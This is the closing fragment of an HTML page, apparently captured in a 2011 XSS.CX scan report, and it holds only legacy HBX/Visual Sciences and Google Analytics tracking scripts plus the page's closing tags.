if((_er==_hud)||(_er==""))_er="bookmark";if(_II(document.cookie,"CP=")!=-1){_ce="y"}else{
document.cookie="CP=nul"+"l*; path=/; expires=Wed, 1 Jan 2020 00:00:00 GMT";_ce=(_II(document.cookie,"CP=")!=-1)?"y":"n"};
var _bnI=_II(navigator.appName,"Microsoft")>-1;var _hM=_II(navigator.userAgent,"Mac")>-1;var _I5=false;
if(_bnI){var _nua=navigator.userAgent,_is=_II(_nua,"MSIE"),_if=_II(_nua,".",_is);if(_if>_is)_I5=_nua.substring(_is+5,_if)>=5}
if(window.screen){_sv=12;_ss=screen.width+"*"+screen.height;_sc=_bnI?screen.colorDepth:screen.pixelDepth;
if(_sc==_hud)_sc="na"}var _ra=new Array();if(_ra.toSource||(_bnI&&_ra.shift))_sv=13;if(_I5&&!_hM){
if(_II(""+navigator.appMinorVersion,"Privacy")>-1)_ce="p";if(document.body&&document.body.addBehavior){document.body.addBehavior("#default#homePage");
_hp=document.body.isHomePage(location.href)?"y":"n";document.body.addBehavior("#default#clientCaps");_cy=document.body.connectionType}}
var _arg=(location.protocol=='https:'?'https://':'http://')+hbx.gn+"/HG?hc=&hb="+hbx.acct+"&cd=1&l=e"+"&ja="+(navigator.javaEnabled()?"y":"n")+
_E("rf,er,ce,vpc,sv,ss,sc,cy,hp");if(typeof eval("hbx.mlc")!=_hud&&_II(hbx.mlc,"CONTENT+CATEGORY")<0)_arg+="&vcon="+_A(hbx.mlc);
var _hbi=new Image();_hbi.src=_arg+"&hid="+Math.random();</script>
<script type="text/javascript">if(_sv<11){document.write("<img src='"+_arg+"' border='0' height='1' width='1'>")}</script>
<!--END VISUAL SCIENCES CODE-->    <script type="text/javascript">
   /* <![CDATA[ */
       var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
       document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
   /* ]]> */
   </script>
<script type="text/javascript">
/* <![CDATA[ */
try {
           var pageTracker = _gat._getTracker("UA-5290160-1");
           pageTracker._initData();
           pageTracker._trackPageview();
           } catch(err) {}
   /* ]]> */
   </script>
   
       <div id="pixelsection" style="display: none;"></div>
            </body>
</html>

Report generated by XSS.CX at Mon Mar 07 18:42:46 CST 2011.